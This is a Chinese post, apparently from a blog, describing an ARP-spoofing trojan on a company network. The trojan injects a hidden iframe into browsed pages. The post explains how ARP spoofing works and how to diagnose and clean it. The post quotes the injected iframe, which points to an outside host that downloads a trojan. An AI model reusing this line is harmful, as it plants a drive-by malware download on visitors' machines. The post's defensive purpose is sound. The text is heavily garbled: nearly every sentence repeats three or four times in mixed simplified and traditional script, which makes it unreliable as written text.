arp病毒--电脑浏览器中毒后，浏览页面的时候都被嵌套了iframe代码

我的电脑的浏览器中毒了， 看每个网页， 源代码前面都会被自动加了一段“<iframesrc='http://www.souxse.cn/arp.htm'width=0height=0></ iframe>”这样的代码， 请问是什么问题？

这段iframe的代码指向网站后， 会下载一个s.jpg的文件到临时文件夹， 这个是什么木马文件吗？ 这段iframe的代码指向网站后， 会下载一个s.jpg的文件到临时文件夹， 这个是什么木马文件吗？ 這段iframe的代碼指向網站後， 會下載一個s.jpg的文件到臨時文件夾， 這個是什麼木馬文件嗎？ 这段iframe的代码指向网站后， 会下载一个s.jpg的文件到临时文件夹， 这个是什么木马文件吗？

我已经试过以下杀毒方法：我已經試過以下殺毒方法： 我已经试过以下杀毒方法：我已经试过以下杀毒方法：

1、卡巴斯基－－可以检测， 选择阻止， 但杀不了。 1、卡巴斯基－－可以检测， 选择阻止， 但杀不了。 1、卡巴斯基－－可以檢測， 選擇阻止， 但殺不了。 1、卡巴斯基－－可以检测， 选择阻止， 但杀不了。

2、瑞星——可以检测， 选择阻止， 但杀不了。 2、瑞星——可以检测， 选择阻止， 但杀不了。 2、瑞星——可以檢測， 選擇阻止， 但殺不了。 2、瑞星——可以检测， 选择阻止， 但杀不了。

3、Norton——可以检测， 选择阻止， 但杀不了。 3、Norton——可以检测， 选择阻止， 但杀不了。 3、Norton——可以檢測， 選擇阻止， 但殺不了。 3、Norton——可以检测， 选择阻止， 但杀不了。

4、Mcafee——可以检测， 选择阻止， 可以删除文件。 4、Mcafee——可以检测， 选择阻止， 可以删除文件。 4、Mcafee——可以檢測， 選擇阻止， 可以刪除文件。 4、Mcafee——可以检测， 选择阻止， 可以删除文件。 但只要再开一个新的页面， 又会重新下载的。 但只要再开一个新的页面， 又会重新下载的。 但只要再開一個新的頁面， 又會重新下載的。 但只要再开一个新的页面， 又会重新下载的。

最麻烦的是， 这个东西已经在我公司的局域网里面开始蔓延， 已经另外有四台感染， 其中包括98系统的。 最麻烦的是， 这个东西已经在我公司的局域网里面开始蔓延， 已经另外有四台感染， 其中包括98系统的。 最麻煩的是， 這個東西已經在我公司的局域網裡面開始蔓延， 已經另外有四台感染， 其中包括98系統的。 最麻烦的是， 这个东西已经在我公司的局域网里面开始蔓延， 已经另外有四台感染， 其中包括98系统的。

昨晚下载了黄山ie修复器， 还有360安全卫士， 把windows的安全漏洞都打上补丁后， 在安全模式下再用这两个东西全面清除和修复， 现在已经没问题了， 呵呵。 昨晚下载了黄山ie修复器， 还有360安全卫士， 把windows的安全漏洞都打上补丁后， 在安全模式下再用这两个东西全面清除和修复， 现在已经没问题了， 呵呵。 昨晚下載了黃山ie修復器， 還有360安全衛士， 把windows的安全漏洞都打上補丁後， 在安全模式下再用這兩個東西全面清除和修復， 現在已經沒問題了， 呵呵。 昨晚下载了黄山ie修复器， 还有360安全卫士， 把windows的安全漏洞都打上补丁后， 在安全模式下再用这两个东西全面清除和修复， 现在已经没问题了， 呵呵。

今天早上开始， 公司局域网就很不正常， 频繁断网。 今天早上开始， 公司局域网就很不正常， 频繁断网。 今天早上開始， 公司局域網就很不正常， 頻繁斷網。 今天早上开始， 公司局域网就很不正常， 频繁断网。

中午休息时打开我的博客， 卡巴立即提示含有木马病毒。 中午休息时打开我的博客， 卡巴立即提示含有木马病毒。 中午休息時打開我的博客， 卡巴立即提示含有木馬病毒。 中午休息时打开我的博客， 卡巴立即提示含有木马病毒。 很纳闷， 难道网站被种木马了？ 很纳闷， 难道网站被种木马了？ 很納悶， 難道網站被種木馬了？ 很纳闷， 难道网站被种木马了？ 查看网页源代码， 发现在顶部有这样一行代码， 原来是被加入了嵌套框架网页， 进而执行此网站上的木马程序。 查看网页源代码， 发现在顶部有这样一行代码， 原来是被加入了嵌套框架网页， 进而执行此网站上的木马程序。 查看網頁源代碼， 發現在頂部有這樣一行代碼， 原來是被加入了嵌套框架網頁， 進而執行此網站上的木馬程序。 查看网页源代码， 发现在顶部有这样一行代码， 原来是被加入了嵌套框架网页， 进而执行此网站上的木马程序。

第一反应就是登陆上FTP， 将文件下载下来查看了一遍， 没有发现异常。 第一反应就是登陆上FTP， 将文件下载下来查看了一遍， 没有发现异常。 第一反應就是登陸上FTP， 將文件下載下來查看了一遍， 沒有發現異常。 第一反应就是登陆上FTP， 将文件下载下来查看了一遍， 没有发现异常。 网站文件没问题， 应该就是数据在发送的过程中被篡改了。 网站文件没问题， 应该就是数据在发送的过程中被篡改了。 網站文件沒問題， 應該就是數據在發送的過程中被篡改了。 网站文件没问题， 应该就是数据在发送的过程中被篡改了。 进百度打算搜索， 却发现百度的首页也被加入了， 汗！ 进百度打算搜索， 却发现百度的首页也被加入了， 汗！ 進百度打算搜索， 卻發現百度的首頁也被加入了， 汗！ 进百度打算搜索， 却发现百度的首页也被加入了， 汗！ 再开Google， 晕死， 也有！ 再开Google， 晕死， 也有！ 再開Google， 暈死， 也有！ 再开Google， 晕死， 也有！ 新浪， 有！ 新浪， 有！ 新浪， 有！ 新浪， 有！ 天涯， 有！ 天涯， 有！ 天涯， 有！ 天涯， 有！ 不会这么疯狂吧！ 不会这么疯狂吧！ 不會這麼瘋狂吧！ 不会这么疯狂吧！ ！ ！ ！ ！ 查找了一些资料， 才知道是ARP欺骗。 查找了一些资料， 才知道是ARP欺骗。 查找了一些資料， 才知道是ARP欺騙。 查找了一些资料， 才知道是ARP欺骗。

找到一些解决的方法， 稍微整理了一下。 找到一些解决的方法， 稍微整理了一下。 找到一些解決的方法， 稍微整理了一下。 找到一些解决的方法， 稍微整理了一下。

一、什么是“ARP欺骗”？ 一、什么是“ARP欺骗”？ 一、什麼是“ARP欺騙”？ 一、什么是“ARP欺骗”？

ARP的意思是Address Resolution Protocol（地址解析协议）， 它是一个位于TCP/IP协议栈中的低层协议， 负责将某个IP地址解析成对应的MAC地址。 ARP的意思是AddressResolutionProtocol（地址解析协议）， 它是一个位于TCP/IP协议栈中的低层协议， 负责将某个IP地址解析成对应的MAC地址。 ARP的意思是AddressResolutionProtocol（地址解析協議）， 它是一個位於TCP/IP協議棧中的低層協議， 負責將某個IP地址解析成對應的MAC地址。 ARP的意思是AddressResolutionProtocol（地址解析协议）， 它是一个位于TCP/IP协议栈中的低层协议， 负责将某个IP地址解析成对应的MAC地址。

从影响网络连接通畅的方式来看， ARP欺骗分为二种， 一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。 从影响网络连接通畅的方式来看， ARP欺骗分为二种， 一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。 從影響网絡連接通暢的方式來看， ARP欺騙分為二種， 一種是對路由器ARP表的欺騙；另一種是對內網PC的網關欺騙。 从影响网络连接通畅的方式来看， ARP欺骗分为二种， 一种是对路由器ARP表的欺骗；另一种是对内网PC的网关欺骗。

第一种ARP欺骗的原理是——截获网关数据。 第一种ARP欺骗的原理是——截获网关数据。 第一種ARP欺騙的原理是——截獲網關數據。 第一种ARP欺骗的原理是——截获网关数据。 它通知路由器一系列错误的内网MAC地址， 并按照一定的频率不断进行， 使真实的地址信息无法通过更新保存在路由器中， 结果路由器的所有数据只能发送给错误的MAC地址， 造成正常PC无法收到信息。 它通知路由器一系列错误的内网MAC地址， 并按照一定的频率不断进行， 使真实的地址信息无法通过更新保存在路由器中， 结果路由器的所有数据只能发送给错误的MAC地址， 造成正常PC无法收到信息。 它通知路由器一系列錯誤的內網MAC地址， 並按照一定的頻率不斷進行， 使真實的地址信息無法通過更新保存在路由器中， 結果路由器的所有數據只能發送給錯誤的MAC地址， 造成正常PC無法收到信息。 它通知路由器一系列错误的内网MAC地址， 并按照一定的频率不断进行， 使真实的地址信息无法通过更新保存在路由器中， 结果路由器的所有数据只能发送给错误的MAC地址， 造成正常PC无法收到信息。

第二种ARP欺骗的原理是——伪造网关。 第二种ARP欺骗的原理是——伪造网关。 第二種ARP欺騙的原理是——偽造網關。 第二种ARP欺骗的原理是——伪造网关。 它的原理是建立假网关， 让被它欺骗的PC向假网关发数据， 而不是通过正常的路由器途径上网。 它的原理是建立假网关， 让被它欺骗的PC向假网关发数据， 而不是通过正常的路由器途径上网。 它的原理是建立假網關， 讓被它欺騙的PC向假網關發數據， 而不是通過正常的路由器途徑上網。 它的原理是建立假网关， 让被它欺骗的PC向假网关发数据， 而不是通过正常的路由器途径上网。 在PC看来， 就是上不了网了， “网络掉线了”。 在PC看来， 就是上不了网了， “网络掉线了”。 在PC看來， 就是上不了網了， “网絡掉線了”。 在PC看来， 就是上不了网了， “网络掉线了”。 ARP欺骗木马只需成功感染一台电脑， 就可能导致整个局域网都无法上网， 严重的甚至可能带来整个网络的瘫痪。 ARP欺骗木马只需成功感染一台电脑， 就可能导致整个局域网都无法上网， 严重的甚至可能带来整个网络的瘫痪。 ARP欺騙木馬只需成功感染一台電腦， 就可能導致整個局域網都無法上網， 嚴重的甚至可能帶來整個网絡的癱瘓。 ARP欺骗木马只需成功感染一台电脑， 就可能导致整个局域网都无法上网， 严重的甚至可能带来整个网络的瘫痪。

这次是公司局域网中某台电脑中了木马， 造成局域网内的ARP欺骗， 使得浏览网页时会自动在页面顶部加入 iframe 代码。 这次是公司局域网中某台电脑中了木马， 造成局域网内的ARP欺骗， 使得浏览网页时会自动在页面顶部加入iframe代码。 這次是公司局域網中某台電腦中了木馬， 造成局域網內的ARP欺騙， 使得瀏覽網頁時會自動在頁面頂部加入iframe代碼。 这次是公司局域网中某台电脑中了木马， 造成局域网内的ARP欺骗， 使得浏览网页时会自动在页面顶部加入iframe代码。

二、故障现象及原因分析二、故障現象及原因分析 二、故障现象及原因分析二、故障现象及原因分析

情况一、当局域网内某台主机感染了ARP病毒时， 会向本局域网内（指某一网段， 比如10.15.3.0这一段）所有主机发送ARP欺骗攻击， 让原本流向网络中心的流量改道流向病毒主机， 并通过病毒主机代理上网。 情况一、当局域网内某台主机感染了ARP病毒时， 会向本局域网内（指某一网段， 比如10.15.3.0这一段）所有主机发送ARP欺骗攻击， 让原本流向网络中心的流量改道流向病毒主机， 并通过病毒主机代理上网。 情況一、當局域網內某台主機感染了ARP病毒時， 會向本局域網內（指某一網段， 比如10.15.3.0這一段）所有主機發送ARP欺騙攻擊， 讓原本流向网絡中心的流量改道流向病毒主機， 並通過病毒主機代理上網。 情况一、当局域网内某台主机感染了ARP病毒时， 会向本局域网内（指某一网段， 比如10.15.3.0这一段）所有主机发送ARP欺骗攻击， 让原本流向网络中心的流量改道流向病毒主机， 并通过病毒主机代理上网。 因客户端具有防代理功能， 造成受害者无法通过病毒主机上网。 因客户端具有防代理功能， 造成受害者无法通过病毒主机上网。 因客戶端具有防代理功能， 造成受害者無法通過病毒主機上網。 因客户端具有防代理功能， 造成受害者无法通过病毒主机上网。

由于病毒发作时发出大量数据包会将网络拥塞， 大家会感觉上网速度越来越慢。 由于病毒发作时发出大量数据包会将网络拥塞， 大家会感觉上网速度越来越慢。 由於病毒發作時發出大量數據包會將网絡擁塞， 大家會感覺上網速度越來越慢。 由于病毒发作时发出大量数据包会将网络拥塞， 大家会感觉上网速度越来越慢。 中毒者同样如此， 受其自身处理能力的限制， 感觉运行速度很慢时， 可能会采取重新启动或其他措施。 中毒者同样如此， 受其自身处理能力的限制， 感觉运行速度很慢时， 可能会采取重新启动或其他措施。 中毒者同樣如此， 受其自身處理能力的限制， 感覺運行速度很慢時， 可能會採取重新啟動或其他措施。 中毒者同样如此， 受其自身处理能力的限制， 感觉运行速度很慢时， 可能会采取重新启动或其他措施。 此时病毒短时间停止工作， 大家会感到网络恢复正常。 此时病毒短时间停止工作， 大家会感到网络恢复正常。 此時病毒短時間停止工作， 大家會感到网絡恢復正常。 此时病毒短时间停止工作， 大家会感到网络恢复正常。 如此反复， 就造成网络时断时续。 如此反复， 就造成网络时断时续。 如此反覆， 就造成网絡時斷時續。 如此反覆， 就造成网络时断时续。

情况二、局域网内有某些用户使用了ARP欺骗程序（如：网络执法官、网络剪刀手、传奇木马、QQ盗号软件等）发送ARP欺骗数据包， 致使被攻击的电脑出现突然不能上网， 过一段时间又能上网， 反复掉线的现象。 情况二、局域网内有某些用户使用了ARP欺骗程序（如：网络执法官、网络剪刀手、传奇木马、QQ盗号软件等）发送ARP欺骗数据包， 致使被攻击的电脑出现突然不能上网， 过一段时间又能上网， 反复掉线的现象。 情況二、局域網內有某些用戶使用了ARP欺騙程序（如：网絡執法官、网絡剪刀手、傳奇木馬、QQ盜號軟件等）發送ARP欺騙數據包， 致使被攻擊的電腦出現突然不能上網， 過一段時間又能上網， 反覆掉線的現象。 情况二、局域网内有某些用户使用了ARP欺骗程序（如：网络执法官、网络剪刀手、传奇木马、QQ盗号软件等）发送ARP欺骗数据包， 致使被攻击的电脑出现突然不能上网， 过一段时间又能上网， 反覆掉线的现象。

三、故障诊断三、故障診斷 三、故障诊断三、故障诊断

如果发现以上疑似情况， 可以通过如下操作进行诊断：点击”开始”按钮->选择”运行”->输入”arp -d”->点击”确定”按钮， 然后重新尝试上网， 如果能恢复正常， 则说明此次掉线可能是受ARP欺骗所致。 如果发现以上疑似情况， 可以通过如下操作进行诊断：点击”开始”按钮->选择”运行”->输入”arp-d”->点击”确定”按钮， 然后重新尝试上网， 如果能恢复正常， 则说明此次掉线可能是受ARP欺骗所致。 如果發現以上疑似情況， 可以通過如下操作進行診斷：點擊”開始”按鈕->選擇”運行”->輸入”arp-d”->點擊”確定”按鈕， 然後重新嘗試上網， 如果能恢復正常， 則說明此次掉線可能是受ARP欺騙所致。 如果发现以上疑似情况， 可以通过如下操作进行诊断：点击”开始”按钮->选择”运行”->输入”arp-d”->点击”确定”按钮， 然后重新尝试上网， 如果能恢复正常， 则说明此次掉线可能是受ARP欺骗所致。 注：”arp -d”命令用于清除并重建本机arp表。 注：”arp-d”命令用于清除并重建本机arp表。 注：”arp-d”命令用於清除並重建本機arp表。 注：”arp-d”命令用于清除并重建本机arp表。 ”arp -d”命令并不能抵御ARP欺骗， 执行后仍有可能再次遭受ARP攻击。 ”arp-d”命令并不能抵御ARP欺骗， 执行后仍有可能再次遭受ARP攻击。 ”arp-d”命令並不能抵禦ARP欺騙， 執行後仍有可能再次遭受ARP攻擊。 ”arp-d”命令并不能抵御ARP欺骗， 执行后仍有可能再次遭受ARP攻击。

四、故障处理四、故障處理 四、故障处理四、故障处理

1、中毒者：使用趋势科技ARP病毒专杀工具查杀病毒（已提供下载） 1、中毒者：使用趨勢科技ARP病毒專殺工具查殺病毒（已提供下載） 1、中毒者：使用趋势科技ARP病毒专杀工具查杀病毒（已提供下载） 1、中毒者：使用趋势科技ARP病毒专杀工具查杀病毒（已提供下载）

下载后解压缩， 运行包内TSC.exe文件， 不要关让它一直运行完， 最后查看report文档便知是否中毒。 下载后解压缩， 运行包内TSC.exe文件， 不要关让它一直运行完， 最后查看report文档便知是否中毒。 下載後解壓縮， 運行包內TSC.exe文件， 不要關讓它一直運行完， 最後查看report文檔便知是否中毒。 下载后解压缩， 运行包内TSC.exe文件， 不要关让它一直运行完， 最后查看report文档便知是否中毒。

2、被害者：使用AntiArp软件抵御ARP攻击（已提供下载） 2、被害者：使用AntiArp軟件抵禦ARP攻擊（已提供下載） 2、被害者：使用AntiArp软件抵御ARP攻击（已提供下载） 2、被害者：使用AntiArp软件抵御ARP攻击（已提供下载）

运行AntiArp。 运行AntiArp。 運行AntiArp。 运行AntiArp。 输入本网段的网关ip地址后， 点击”获取网关MAC地址”， 检查网关IP地址和MAC地址无误后， 点击”自动保护”。 输入本网段的网关ip地址后， 点击”获取网关MAC地址”， 检查网关IP地址和MAC地址无误后， 点击”自动保护”。 輸入本網段的網關ip地址後， 點擊”獲取網關MAC地址”， 檢查網關IP地址和MAC地址無誤後， 點擊”自動保護”。 输入本网段的网关ip地址后， 点击”获取网关MAC地址”， 检查网关IP地址和MAC地址无误后， 点击”自动保护”。 若不知道网关IP地址， 可通过以下操作获取：点击”开始”按钮->选择”运行”->输入”cmd”点击”确定”->输入”ipconfig”按回车， ”Default Gateway”后的IP地址就是网关地址。 若不知道网关IP地址， 可通过以下操作获取：点击”开始”按钮->选择”运行”->输入”cmd”点击”确定”->输入”ipconfig”按回车， ”DefaultGateway”后的IP地址就是网关地址。 若不知道網關IP地址， 可通過以下操作獲取：點擊”開始”按鈕->選擇”運行”->輸入”cmd”點擊”確定”->輸入”ipconfig”按回車， ”DefaultGateway”後的IP地址就是網關地址。 若不知道网关IP地址， 可通过以下操作获取：点击”开始”按钮->选择”运行”->输入”cmd”点击”确定”->输入”ipconfig”按回车， ”DefaultGateway”后的IP地址就是网关地址。 AntiArp软件会在提示框内出现病毒主机的MAC地址。 AntiArp软件会在提示框内出现病毒主机的MAC地址。 AntiArp軟件會在提示框內出現病毒主機的MAC地址。 AntiArp软件会在提示框内出现病毒主机的MAC地址。

这次算是领教了ARP， 呵呵。 这次算是领教了ARP， 呵呵。 這次算是領教了ARP， 呵呵。 这次算是领教了ARP， 呵呵。